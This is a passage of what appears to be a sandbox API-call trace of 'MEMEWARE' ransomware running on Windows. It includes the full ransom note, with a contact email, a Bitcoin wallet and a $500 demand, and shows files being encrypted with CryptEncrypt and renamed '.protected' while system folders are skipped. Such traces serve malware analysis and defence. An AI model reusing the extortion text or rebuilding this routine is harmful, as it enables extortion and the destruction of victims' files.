outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.203] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0095.204] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.204] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0095.204] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.204] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0095.204] CloseHandle (hObject=0xb4) returned 1 [0095.205] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.205] lstrcmpiW (lpString1="MSN Websites", lpString2="Windows") returned -1 [0095.205] lstrcmpiW (lpString1="MSN Websites", lpString2="Program Files") returned -1 [0095.205] lstrcmpiW (lpString1="MSN Websites", lpString2="Program Files (x86)") returned -1 [0095.205] lstrcmpiW (lpString1="MSN Websites", lpString2="$Recycle.bin") returned 1 [0095.205] lstrcmpiW (lpString1="MSN Websites", lpString2="System Volume Information") returned -1 [0095.205] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites") returned 43 [0095.205] lstrcmpW (lpString1="MSN Websites", lpString2=".") returned 1 [0095.205] lstrcmpW (lpString1="MSN Websites", lpString2="..") returned 1 [0095.206] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*") returned 45 [0095.206] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0095.207] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.207] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.207] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.207] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.207] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.207] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\.") returned 45 [0095.207] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.207] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.207] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.207] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.207] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.207] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.207] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.207] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\..") returned 46 [0095.207] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.208] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.208] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.208] lstrcmpiW (lpString1="MSN Autos.url", lpString2="Windows") returned -1 [0095.208] lstrcmpiW (lpString1="MSN Autos.url", lpString2="Program Files") returned -1 [0095.208] lstrcmpiW (lpString1="MSN Autos.url", lpString2="Program Files (x86)") returned -1 [0095.208] lstrcmpiW (lpString1="MSN Autos.url", lpString2="$Recycle.bin") returned 1 [0095.208] lstrcmpiW (lpString1="MSN Autos.url", lpString2="System Volume Information") returned -1 [0095.208] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0095.208] StrStrIW (lpFirst="MSN Autos.url", lpSrch=".protected") returned 0x0 [0095.208] lstrcmpW (lpString1="MSN Autos.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.208] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.208] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.208] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0095.208] StrStrW (lpFirst="MSN Autos.url", lpSrch=".txt") returned 0x0 [0095.208] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0095.208] StrStrW (lpFirst="MSN Autos.url", lpSrch=".rar") returned 0x0 [0095.208] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0095.208] StrStrW (lpFirst="MSN Autos.url", lpSrch=".zip") returned 0x0 [0095.209] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.209] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.209] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.210] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.210] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.210] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.210] CloseHandle (hObject=0xd4) returned 1 [0095.211] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.protected") returned 67 [0095.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.protected" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.protected")) returned 1 [0095.211] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.211] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="Windows") returned -1 [0095.211] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="Program Files") returned -1 [0095.211] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="Program Files (x86)") returned -1 [0095.211] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="$Recycle.bin") returned 1 [0095.211] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="System Volume Information") returned -1 [0095.211] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0095.211] StrStrIW (lpFirst="MSN Entertainment.url", lpSrch=".protected") returned 0x0 [0095.212] lstrcmpW (lpString1="MSN Entertainment.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.212] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.212] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.212] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0095.212] StrStrW (lpFirst="MSN Entertainment.url", lpSrch=".txt") returned 0x0 [0095.212] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0095.212] StrStrW (lpFirst="MSN Entertainment.url", lpSrch=".rar") returned 0x0 [0095.212] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0095.212] StrStrW (lpFirst="MSN Entertainment.url", lpSrch=".zip") returned 0x0 [0095.212] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.213] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.213] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.214] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.214] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.214] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.214] CloseHandle (hObject=0xd4) returned 1 [0095.215] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.protected") returned 75 [0095.215] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.protected" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.protected")) returned 1 [0095.215] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.215] lstrcmpiW (lpString1="MSN Money.url", lpString2="Windows") returned -1 [0095.215] lstrcmpiW (lpString1="MSN Money.url", lpString2="Program Files") returned -1 [0095.215] lstrcmpiW (lpString1="MSN Money.url", lpString2="Program Files (x86)") returned -1 [0095.215] lstrcmpiW (lpString1="MSN Money.url", lpString2="$Recycle.bin") returned 1 [0095.216] lstrcmpiW (lpString1="MSN Money.url", lpString2="System Volume Information") returned -1 [0095.216] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0095.216] StrStrIW (lpFirst="MSN Money.url", lpSrch=".protected") returned 0x0 [0095.216] lstrcmpW (lpString1="MSN Money.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.216] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.216] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.216] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0095.216] StrStrW (lpFirst="MSN Money.url", lpSrch=".txt") returned 0x0 [0095.216] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0095.216] StrStrW (lpFirst="MSN Money.url", lpSrch=".rar") returned 0x0 [0095.216] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0095.216] StrStrW (lpFirst="MSN Money.url", lpSrch=".zip") returned 0x0 [0095.216] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.217] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.217] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.218] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.218] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.218] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.218] CloseHandle (hObject=0xd4) returned 1 [0095.219] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.protected") returned 67 [0095.219] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.protected" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.protected")) returned 1 [0095.220] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.220] lstrcmpiW (lpString1="MSN Sports.url", lpString2="Windows") returned -1 [0095.220] lstrcmpiW (lpString1="MSN Sports.url", lpString2="Program Files") returned -1 [0095.220] lstrcmpiW (lpString1="MSN Sports.url", lpString2="Program Files (x86)") returned -1 [0095.220] lstrcmpiW (lpString1="MSN Sports.url", lpString2="$Recycle.bin") returned 1 [0095.220] lstrcmpiW (lpString1="MSN Sports.url", lpString2="System Volume Information") returned -1 [0095.220] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0095.220] StrStrIW (lpFirst="MSN Sports.url", lpSrch=".protected") returned 0x0 [0095.220] lstrcmpW (lpString1="MSN Sports.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.220] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.220] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.220] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0095.220] StrStrW (lpFirst="MSN Sports.url", lpSrch=".txt") returned 0x0 [0095.220] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0095.220] StrStrW (lpFirst="MSN Sports.url", lpSrch=".rar") returned 0x0 [0095.220] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0095.220] StrStrW (lpFirst="MSN Sports.url", lpSrch=".zip") returned 0x0 [0095.221] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.221] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.221] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.222] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.222] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.222] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.222] CloseHandle (hObject=0xd4) returned 1 [0095.223] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.protected") returned 68 [0095.223] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.protected" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.protected")) returned 1 [0095.224] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.224] lstrcmpiW (lpString1="MSN.url", lpString2="Windows") returned -1 [0095.224] lstrcmpiW (lpString1="MSN.url", lpString2="Program Files") returned -1 [0095.224] lstrcmpiW (lpString1="MSN.url", lpString2="Program Files (x86)") returned -1 [0095.224] lstrcmpiW (lpString1="MSN.url", lpString2="$Recycle.bin") returned 1 [0095.224] lstrcmpiW (lpString1="MSN.url", lpString2="System Volume Information") returned -1 [0095.224] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0095.224] StrStrIW (lpFirst="MSN.url", lpSrch=".protected") returned 0x0 [0095.224] lstrcmpW (lpString1="MSN.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.224] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.224] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.224] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0095.224] StrStrW (lpFirst="MSN.url", lpSrch=".txt") returned 0x0 [0095.224] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0095.224] StrStrW (lpFirst="MSN.url", lpSrch=".rar") returned 0x0 [0095.225] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0095.225] StrStrW (lpFirst="MSN.url", lpSrch=".zip") returned 0x0 [0095.225] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.225] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.226] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.226] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.226] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.226] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.226] CloseHandle (hObject=0xd4) returned 1 [0095.227] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.protected") returned 61 [0095.227] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.protected" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.protected")) returned 1 [0095.228] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.228] lstrcmpiW (lpString1="MSNBC News.url", lpString2="Windows") returned -1 [0095.228] lstrcmpiW (lpString1="MSNBC News.url", lpString2="Program Files") returned -1 [0095.228] lstrcmpiW (lpString1="MSNBC News.url", 